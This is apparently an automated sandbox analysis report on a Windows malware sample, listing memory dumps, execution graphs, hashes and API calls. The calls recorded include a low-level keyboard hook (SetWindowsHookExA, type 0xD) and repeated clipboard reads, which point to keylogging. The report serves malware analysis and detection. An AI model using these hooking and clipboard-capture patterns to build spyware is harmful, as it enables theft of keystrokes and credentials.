                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c88d78709091537906bcbb7139098afc92a800bef6202f4e9c7493586de47ac
                                        • Instruction ID: dbc3c375e4821b4b3efb720c9f2b97f17b64642f2cb1275c86ff4dabe95908b9
                                        • Opcode Fuzzy Hash: 9c88d78709091537906bcbb7139098afc92a800bef6202f4e9c7493586de47ac
                                        • Instruction Fuzzy Hash: 7201F971108B40DFE7105B25CCC4B67FBE8EF81624F18C55AED190E286DB799840CAB6
                                        Function 02A7D758 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1867106069.0000000002A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_2a7d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d235909177bb44e0a129d160392b695df85ba356625d4618e226d640a6e30ede
                                        • Instruction ID: 79c89c78e60cd6f5a2fb7ad03ffa34f8dd6afdad5b8bc9a1a9cce789d2353739
                                        • Opcode Fuzzy Hash: d235909177bb44e0a129d160392b695df85ba356625d4618e226d640a6e30ede
                                        • Instruction Fuzzy Hash: 9BF0C231004740AEE7108B06CCC4B62FBA8EF81624F18C45AED580A286D3799844CAB1

                                        Execution Graph

                                        Execution Coverage:11%
                                        Dynamic/Decrypted Code Coverage:93.6%
                                        Signature Coverage:1.5%
                                        Total number of Nodes:203
                                        Total number of Limit Nodes:25
                                        execution_graph 25769 a9d01c 25770 a9d034 25769->25770 25771 a9d08e 25770->25771 25776 5c66c34 25770->25776 25784 5c6d2b1 25770->25784 25792 5c68b30 25770->25792 25796 5c68b22 25770->25796 25777 5c66c3f 25776->25777 25778 5c6d341 25777->25778 25781 5c6d331 25777->25781 25812 5c6c28c 25778->25812 25780 5c6d33f 25800 5c6d458 25781->25800 25806 5c6d468 25781->25806 25786 5c6d2ba 25784->25786 25785 5c6d341 25787 5c6c28c 2 API calls 25785->25787 25786->25785 25788 5c6d331 25786->25788 25789 5c6d33f 25787->25789 25790 5c6d458 2 API calls 25788->25790 25791 5c6d468 2 API calls 25788->25791 25790->25789 25791->25789 25793 5c68b56 25792->25793 25794 5c66c34 2 API calls 25793->25794 25795 5c68b77 25794->25795 25795->25771 25797 5c68b30 25796->25797 25798 5c66c34 2 API calls 25797->25798 25799 5c68b77 25798->25799 25799->25771 25802 5c6d476 25800->25802 25801 5c6c28c 2 API calls 25801->25802 25802->25801 25803 5c6d552 25802->25803 25819 5c6d930 25802->25819 25824 5c6d940 25802->25824 25803->25780 25808 5c6d476 25806->25808 25807 5c6c28c 2 API calls 25807->25808 25808->25807 25809 5c6d552 25808->25809 25810 5c6d940 OleGetClipboard 25808->25810 25811 5c6d930 OleGetClipboard 25808->25811 25809->25780 25810->25808 25811->25808 25813 5c6c297 25812->25813 25814 5c6d654 25813->25814 25815 5c6d5aa 25813->25815 25816 5c66c34 OleGetClipboard 25814->25816 25817 5c6d602 CallWindowProcW 25815->25817 25818 5c6d5b1 25815->25818 25816->25818 25817->25818 25818->25780 25821 5c6d93e 25819->25821 25820 5c6d9e6 25820->25802 25821->25820 25829 5c6deb7 25821->25829 25835 5c6df00 25821->25835 25825 5c6d95f 25824->25825 25826 5c6d9e6 25825->25826 25827 5c6deb7 OleGetClipboard 25825->25827 25828 5c6df00 OleGetClipboard 25825->25828 25826->25802 25827->25825 25828->25825 25831 5c6debb 25829->25831 25830 5c6df1c 25830->25821 25831->25830 25841 5c6df48 25831->25841 25852 5c6df38 25831->25852 25832 5c6df31 25832->25821 25837 5c6df08 25835->25837 25836 5c6df1c 25836->25821 25837->25836 25839 5c6df48 OleGetClipboard 25837->25839 25840 5c6df38 OleGetClipboard 25837->25840 25838 5c6df31 25838->25821 25839->25838 25840->25838 25842 5c6df5a 25841->25842 25843 5c6df75 25842->25843 25845 5c6dfb9 25842->25845 25848 5c6df48 OleGetClipboard 25843->25848 25849 5c6df38 OleGetClipboard 25843->25849 25844 5c6df7b 25844->25832 25847 5c6e039 25845->25847 25863 5c6e200 25845->25863 25867 5c6e210 25845->25867 25846 5c6e057 25846->25832 25847->25832 25848->25844 25849->25844 25853 5c6df5a 25852->25853 25854 5c6df75 25853->25854 25856 5c6dfb9 25853->25856 25861 5c6df48 OleGetClipboard 25854->25861 25862 5c6df38 OleGetClipboard 25854->25862 25855 5c6df7b 25855->25832 25858 5c6e039 25856->25858 25859 5c6e200 OleGetClipboard 25856->25859 25860 5c6e210 OleGetClipboard 25856->25860 25857 5c6e057 25857->25832 25858->25832 25859->25857 25860->25857 25861->25855 25862->25855 25865 5c6e210 25863->25865 25866 5c6e24b 25865->25866 25871 5c6dca0 25865->25871 25866->25846 25869 5c6e225 25867->25869 25868 5c6dca0 OleGetClipboard 25868->25869 25869->25868 25870 5c6e24b 25869->25870 25870->25846 25872 5c6e2b8 OleGetClipboard 25871->25872 25874 5c6e352 25872->25874 25630 5c6e120 25631 5c6e12b 25630->25631 25632 5c6e13b 25631->25632 25634 5c6db8c 25631->25634 25635 5c6e170 OleInitialize 25634->25635 25636 5c6e1d4 25635->25636 25636->25632 25637 26f0848 25639 26f084e 25637->25639 25638 26f091b 25639->25638 25642 26f149b 25639->25642 25650 26f1380 25639->25650 25644 26f1396 25642->25644 25643 26f1494 25643->25639 25644->25643 25649 26f149b 4 API calls 25644->25649 25659 5c658db 25644->25659 25665 5c658f0 25644->25665 25671 5c6fba0 25644->25671 25677 5c6fb8f 25644->25677 25649->25644 25651 26f135b 25650->25651 25653 26f1383 25650->25653 25651->25639 25652 26f1494 25652->25639 25653->25652 25654 5c658f0 3 API calls 25653->25654 25655 5c658db 3 API calls 25653->25655 25656 26f149b 4 API calls 25653->25656 25657 5c6fba0 SetWindowsHookExA 25653->25657 25658 5c6fb8f SetWindowsHookExA 25653->25658 25654->25653 25655->25653 25656->25653 25657->25653 25658->25653 25660 5c658e5 25659->25660 25663 5c659b3 25660->25663 25683 5c603a4 25660->25683 25662 5c65979 25688 5c603c4 25662->25688 25663->25644 25666 5c65902 25665->25666 25667 5c603a4 2 API calls 25666->25667 25668 5c659b3 25666->25668 25669 5c65979 25667->25669 25668->25644 25670 5c603c4 KiUserCallbackDispatcher 25669->25670 25670->25668 25672 5c6fba8 25671->25672 25673 5c6fbed 25672->25673 25749 5c6fc82 25672->25749 25753 5c6fbf0 25672->25753 25757 5c6fc00 25672->25757 25673->25644 25678 5c6fba8 25677->25678 25679 5c6fbed 25678->25679 25680 5c6fc82 SetWindowsHookExA 25678->25680 25681 5c6fc00 SetWindowsHookExA 25678->25681 25682 5c6fbf0 SetWindowsHookExA 25678->25682 25679->25644 25680->25678 25681->25678 25682->25678 25684 5c603af 25683->25684 25692 5c66eb0 25684->25692 25701 5c66ea1 25684->25701 25685 5c65f5a 25685->25662 25689 5c603cf 25688->25689 25691 5c6d88b 25689->25691 25745 5c6c2e4 25689->25745 25691->25663 25693 5c66edb 25692->25693 25710 5c67420 25693->25710 25715 5c673f0 25693->25715 25694 5c66f5e 25695 5c65e4c GetModuleHandleW 25694->25695 25697 5c66f8a 25694->25697 25696 5c66fce 25695->25696 25700 5c6892d CreateWindowExW 25696->25700 25700->25697 25702 5c66edb 25701->25702 25708 5c67420 GetModuleHandleW 25702->25708 25709 5c673f0 GetModuleHandleW 25702->25709 25703 5c66f5e 25704 5c65e4c GetModuleHandleW 25703->25704 25706 5c66f8a 25703->25706 25705 5c66fce 25704->25705 25740 5c6892d 25705->25740 25708->25703 25709->25703 25712 5c6744d 25710->25712 25711 5c674ce 25712->25711 25720 5c67683 25712->25720 25728 5c675ef 25712->25728 25716 5c67420 25715->25716 25717 5c674ce 25716->25717 25718 5c67683 GetModuleHandleW 25716->25718 25719 5c675ef GetModuleHandleW 25716->25719 25718->25717 25719->25717 25721 5c676af 25720->25721 25736 5c65e4c 25721->25736 25723 5c6771a 25724 5c65e4c GetModuleHandleW 25723->25724 25725 5c67794 25723->25725 25726 5c67768 25724->25726 25725->25711 25726->25725 25727 5c65e4c GetModuleHandleW 25726->25727 25727->25725 25729 5c675fa 25728->25729 25730 5c65e4c GetModuleHandleW 25729->25730 25731 5c6771a 25730->25731 25732 5c65e4c GetModuleHandleW 25731->25732 25735 5c67794 25731->25735 25733 5c67768 25732->25733 25734 5c65e4c GetModuleHandleW 25733->25734 25733->25735 25734->25735 25735->25711 25737 5c678d0 GetModuleHandleW 25736->25737 25739 5c67945 25737->25739 25739->25723 25741 5c68965 CreateWindowExW 25740->25741 25742 5c68931 25740->25742 25744 5c68a9c 25741->25744 25742->25706 25746 5c6d8a0 KiUserCallbackDispatcher 25745->25746 25748 5c6d90e 25746->25748 25748->25689 25751 5c6fc3d 25749->25751 25750 5c6fc90 25750->25672 25751->25750 25761 5c6ee00 25751->25761 25755 5c6fc1d 25753->25755 25754 5c6fc90 25754->25672 25755->25754 25756 5c6ee00 SetWindowsHookExA 25755->25756 25756->25755 25759 5c6fc1d 25757->25759 25758 5c6fc90 25758->25672 25759->25758 25760 5c6ee00 SetWindowsHookExA 25759->25760 25760->25759 25762 5c6fe08 SetWindowsHookExA 25761->25762 25764 5c6fe92 25762->25764 25764->25751 25765 5c678ca 25766 5c678d0 GetModuleHandleW 25765->25766 25768 5c67945 25766->25768 25875 5c6c6d8 DuplicateHandle 25876 5c6c76e 25875->25876

                                        Executed Functions

                                        Function 05C6EE00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 149 5c6ee00-5c6fe52 152 5c6fe54-5c6fe5c 149->152 153 5c6fe5e-5c6fe90 SetWindowsHookExA 149->153 152->153 154 5c6fe92-5c6fe98 153->154 155 5c6fe99-5c6feb9 153->155 154->155
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,05C6FC70,00000000,00000000), ref: 05C6FE83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID: s,s#
                                        • API String ID: 2559412058-3488363693
                                        • Opcode ID: bb7c10f17fbf86ade3a087991406cb6ce444b3702f0feb000ba564107f08fc68
                                        • Instruction ID: 73c13790e3dda68fc43683504fce5d681238d31f30d72abf49db58f6d7f1f730
                                        • Opcode Fuzzy Hash: bb7c10f17fbf86ade3a087991406cb6ce444b3702f0feb000ba564107f08fc68
                                        • Instruction Fuzzy Hash: 3C2127B5D046499FDB14DF9AD884BEEFBF5FB88310F108429E419A7250C775AA40CFA0
                                        Function 026F9638 Relevance: 3.1, Instructions: 3057COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c60aaa0352ac09afea63245eb9330c4aa74df7671b43d9ae7e658f7245885e74
                                        • Instruction ID: 94a84de9ed15488e22e559f929b39f5e43fe0f07e58c0447d97abc14ec0f9448
                                        • Opcode Fuzzy Hash: c60aaa0352ac09afea63245eb9330c4aa74df7671b43d9ae7e658f7245885e74
                                        • Instruction Fuzzy Hash: 6A631E31D10B1A8ADB51EF68C8846A9F7B1FF99300F11D79AD45877221EB70AAD4CF81
                                        Function 026F4AA8 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: 8d7ba2ae39569e935ed6081140211b2c2be7b9f1b9e47b9f725bf04dbcbed23c
                                        • Instruction ID: 4d481b040d42667261e4dc87d2763c51e4e1e805ee89fe72f6b6c6604f2a7170
                                        • Opcode Fuzzy Hash: 8d7ba2ae39569e935ed6081140211b2c2be7b9f1b9e47b9f725bf04dbcbed23c
                                        • Instruction Fuzzy Hash: 15B18C71E00209CFEF54CFA9C88179EBBF2AF88314F148129DA15E7794EB749881CB80
                                        Function 026F3E90 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: s,s#$s,s#
                                        • API String ID: 0-128926716
                                        • Opcode ID: 87cef4c9f048777e7113ebdf9f82997b902c2f66d4d791cd5f9dc3616f97cba8
                                        • Instruction ID: f047a3dad5a957af1a14543d87f35c6487294a95ea59b218c39247a2ebd6f925
                                        • Opcode Fuzzy Hash: 87cef4c9f048777e7113ebdf9f82997b902c2f66d4d791cd5f9dc3616f97cba8
                                        • Instruction Fuzzy Hash: 1D917970E00249DFDF54DFA9C9817AEBBF2AF88304F148129E614E7794EB749885CB85
                                        Function 026FC8B0 Relevance: 2.3, Instructions: 2312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31514e40c42596a6b69067337d78eeecc4477afcbd751644f95755af1f581544
                                        • Instruction ID: 589068a24735d0a6f60ff809c91cbb9f484d1fc410ce3cabb0a8426d14fb4bbf
                                        • Opcode Fuzzy Hash: 31514e40c42596a6b69067337d78eeecc4477afcbd751644f95755af1f581544
                                        • Instruction Fuzzy Hash: 63333031D107198EDB11EF68C8846ADF7B1FF99300F15C79AE558A7221EB70AAC5CB81
                                        Function 026F8E78 Relevance: .6, Instructions: 612COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1935197820.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26f0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4903b5bb2fc21874695365583b539a0bda074c1b1bcc4638eb6296e0c6b982d8
                                        • Instruction ID: 45d9f5b301b8c267b827100eb510847a7c5ddc5f2160ec82088949ba407ace4a
                                        • Opcode Fuzzy Hash: 4903b5bb2fc21874695365583b539a0bda074c1b1bcc4638eb6296e0c6b982d8
                                        • Instruction Fuzzy Hash: 0D327A75A012058FDF54DFA8D984BADBBB2FB88310F148569EA06EB395DB31DC41CB90
                                        Function 05C6892D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 137COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 5c6892d-5c6892f 1 5c68965-5c689de 0->1 2 5c68931-5c68958 call 5c66c0c 0->2 4 5c689e0-5c689e6 1->4 5 5c689e9-5c689f0 1->5 6 5c6895d-5c6895e 2->6 4->5 7 5c689f2-5c689f8 5->7 8 5c689fb-5c68a9a CreateWindowExW 5->8 7->8 10 5c68aa3-5c68adb 8->10 11 5c68a9c-5c68aa2 8->11 15 5c68add-5c68ae0 10->15 16 5c68ae8 10->16 11->10 15->16 17 5c68ae9 16->17 17->17
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C68A8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID: s,s#$s,s#
                                        • API String ID: 716092398-128926716
                                        • Opcode ID: dc1172fa9bedfea33d33b861c9f1f7f90045f2ef075876b71239c5bb554c886d
                                        • Instruction ID: bd1403551983e45771126bb6ec2c3bc2b8bf3ac282cb6d76e2c2f9c6665a7ca8
                                        • Opcode Fuzzy Hash: dc1172fa9bedfea33d33b861c9f1f7f90045f2ef075876b71239c5bb554c886d
                                        • Instruction Fuzzy Hash: 4F51EFB5C00249EFDF15CF99C884ADDBFB2BF48310F24856AE918AB221D7719995CF90
                                        Function 05C6896E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 18 5c6896e-5c689de 19 5c689e0-5c689e6 18->19 20 5c689e9-5c689f0 18->20 19->20 21 5c689f2-5c689f8 20->21 22 5c689fb-5c68a33 20->22 21->22 23 5c68a3b-5c68a9a CreateWindowExW 22->23 24 5c68aa3-5c68adb 23->24 25 5c68a9c-5c68aa2 23->25 29 5c68add-5c68ae0 24->29 30 5c68ae8 24->30 25->24 29->30 31 5c68ae9 30->31 31->31
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C68A8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID: s,s#$s,s#
                                        • API String ID: 716092398-128926716
                                        • Opcode ID: e094002ffa48d540bd6171de2538b752234a01760f7ecd6ef0fcc1806b9fcd22
                                        • Instruction ID: 6fe940da5c47f103a6a4b5953b9b27df2b50d5415f5da173217dadabf28315f6
                                        • Opcode Fuzzy Hash: e094002ffa48d540bd6171de2538b752234a01760f7ecd6ef0fcc1806b9fcd22
                                        • Instruction Fuzzy Hash: FD51C0B5D10349DFDB14CF9AC884ADEBBF1BF48310F24852AE819AB211D7759985CF90
                                        Function 05C68978 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 32 5c68978-5c689de 33 5c689e0-5c689e6 32->33 34 5c689e9-5c689f0 32->34 33->34 35 5c689f2-5c689f8 34->35 36 5c689fb-5c68a33 34->36 35->36 37 5c68a3b-5c68a9a CreateWindowExW 36->37 38 5c68aa3-5c68adb 37->38 39 5c68a9c-5c68aa2 37->39 43 5c68add-5c68ae0 38->43 44 5c68ae8 38->44 39->38 43->44 45 5c68ae9 44->45 45->45
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05C68A8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID: s,s#$s,s#
                                        • API String ID: 716092398-128926716
                                        • Opcode ID: fdab8e09d481665c3d9480803216b1efe28972ee030457510ae8f6b2eb5b0807
                                        • Instruction ID: 9349d98ea79c1dadbe1f07c0d2687a3ecd0bac03bbe52bbe7e1793d206c27de7
                                        • Opcode Fuzzy Hash: fdab8e09d481665c3d9480803216b1efe28972ee030457510ae8f6b2eb5b0807
                                        • Instruction Fuzzy Hash: A941CEB1D00349DFDB14CFAAC884ADEBBF5BF48310F24862AE819AB210D7759945CF90
                                        Function 05C65E4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 46 5c65e4c-5c67910 48 5c67912-5c67915 46->48 49 5c67918-5c67943 GetModuleHandleW 46->49 48->49 50 5c67945-5c6794b 49->50 51 5c6794c-5c67960 49->51 50->51
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05C67936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID: s,s#$s,s#
                                        • API String ID: 4139908857-128926716
                                        • Opcode ID: 35b575b0cea4a5252d59d4ca972fca29426ac5a3ffa7ac45ea2b3eccc77df3c8
                                        • Instruction ID: a1b159d3f320f5d70c5127284fd77cc35399650f8c7fc79807e8211be485459f
                                        • Opcode Fuzzy Hash: 35b575b0cea4a5252d59d4ca972fca29426ac5a3ffa7ac45ea2b3eccc77df3c8
                                        • Instruction Fuzzy Hash: D71132B1C006498FDB14CF9AC484B9EFBF4EF49224F10882AD419B7300D375A605CFA0
                                        Function 05C678CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 53 5c678ca-5c67910 55 5c67912-5c67915 53->55 56 5c67918-5c67943 GetModuleHandleW 53->56 55->56 57 5c67945-5c6794b 56->57 58 5c6794c-5c67960 56->58 57->58
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05C67936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID: s,s#$s,s#
                                        • API String ID: 4139908857-128926716
                                        • Opcode ID: 574b81ed2328d90b1f0587c9abd3fc17ee7e4bfa473f28d09b18dc9ccbc1c0ba
                                        • Instruction ID: f956c134887f412d5a653751bd92d48de10db7c12a64201476f5b3b9a29384fc
                                        • Opcode Fuzzy Hash: 574b81ed2328d90b1f0587c9abd3fc17ee7e4bfa473f28d09b18dc9ccbc1c0ba
                                        • Instruction Fuzzy Hash: 90110FB6C006498FDB14CF9AD884BDEFBF4EB88324F10881AD429A7210D375A645CFA1
                                        Function 05C6C28C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 96 5c6c28c-5c6d5a4 99 5c6d654-5c6d674 call 5c66c34 96->99 100 5c6d5aa-5c6d5af 96->100 107 5c6d677-5c6d684 99->107 102 5c6d602-5c6d63a CallWindowProcW 100->102 103 5c6d5b1-5c6d5e8 100->103 104 5c6d643-5c6d652 102->104 105 5c6d63c-5c6d642 102->105 110 5c6d5f1-5c6d600 103->110 111 5c6d5ea-5c6d5f0 103->111 104->107 105->104 110->107 111->110
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05C6D629
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID: s,s#
                                        • API String ID: 2714655100-3488363693
                                        • Opcode ID: 1dc99501e2bca4d0970dddd3daa53e5969a56f09b48c0f673482762da491a7bf
                                        • Instruction ID: 2582d0faa278a038036bf5fb5e8edc485a00215faa75775eb7d85af523bf81b0
                                        • Opcode Fuzzy Hash: 1dc99501e2bca4d0970dddd3daa53e5969a56f09b48c0f673482762da491a7bf
                                        • Instruction Fuzzy Hash: 474129B4A003498FDB14CF99C488AAABBF5FF88314F248859D51AA7321D375E941CFA0
                                        Function 05C6DCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74comclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 113 5c6dca0-5c6e350 OleGetClipboard 116 5c6e352-5c6e358 113->116 117 5c6e359-5c6e3a7 113->117 116->117 122 5c6e3b7 117->122 123 5c6e3a9-5c6e3ad 117->123 125 5c6e3b8 122->125 123->122 124 5c6e3af 123->124 124->122 125->125
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID: s,s#
                                        • API String ID: 220874293-3488363693
                                        • Opcode ID: aee143083b4c7e143996b14a68ce91c6969e672d331b14954447d969ee83e09b
                                        • Instruction ID: 4c2c0199ae7a9dc0fc44d7804687a84d2ff445ac53554b79e04cff5be46d6e81
                                        • Opcode Fuzzy Hash: aee143083b4c7e143996b14a68ce91c6969e672d331b14954447d969ee83e09b
                                        • Instruction Fuzzy Hash: A1311FB4D01249DFEB14DF99C884B8EBBF5AF48304F20842AE404BB390D7B4AA45CB95
                                        Function 05C6E2AC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73comclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 126 5c6e2ac-5c6e308 128 5c6e312-5c6e350 OleGetClipboard 126->128 129 5c6e352-5c6e358 128->129 130 5c6e359-5c6e3a7 128->130 129->130 135 5c6e3b7 130->135 136 5c6e3a9-5c6e3ad 130->136 138 5c6e3b8 135->138 136->135 137 5c6e3af 136->137 137->135 138->138
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID: s,s#
                                        • API String ID: 220874293-3488363693
                                        • Opcode ID: 86c9ebb063a8a122be519e3b602ac0017a0632a15b8f2e876115ee6b2c75ad82
                                        • Instruction ID: 268700d496000ccd3d35e79611608167d821c4f34ecb859e64f14efa563d810b
                                        • Opcode Fuzzy Hash: 86c9ebb063a8a122be519e3b602ac0017a0632a15b8f2e876115ee6b2c75ad82
                                        • Instruction Fuzzy Hash: B73101B4D01248DFDB14DF99C984B9EBBF5BF48304F24842AE004AB390DBB4A945CFA5
                                        Function 05C6C6D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 139 5c6c6d0-5c6c76c DuplicateHandle 140 5c6c775-5c6c792 139->140 141 5c6c76e-5c6c774 139->141 141->140
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C6C75F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1938367145.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_5c60000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID: s,s#
                                        • API String ID: 3793708945-3488363693
                                        • Opcode ID: de65de820b086da7adf1faca7f0ddeed40b02c1a5953019303a626100ae79924
                                        • Instruction ID: c42c14a13293d29c91c81ffe2fab37b2db288ea11956397336cb1df5ad976bae
                                        • Opcode Fuzzy Hash: de65de820b086da7adf1faca7f0ddeed40b02c1a5953019303a626100ae79924
                                        • Instruction Fuzzy Hash: 7321E0B5901249EFDB10CFAAD984AEEBBF5FB48310F14841AE958A3250D374AA41CF61
                                        Function 05C6C6D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 144 5c6c6d8-5c6c76c DuplicateHandle 145 5c6c775-5c6c792 144->145 146 5c6c76e-5c6c774 144->146 146->145
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05C6C75F
                                        Strings
                                        Memory Dump Source
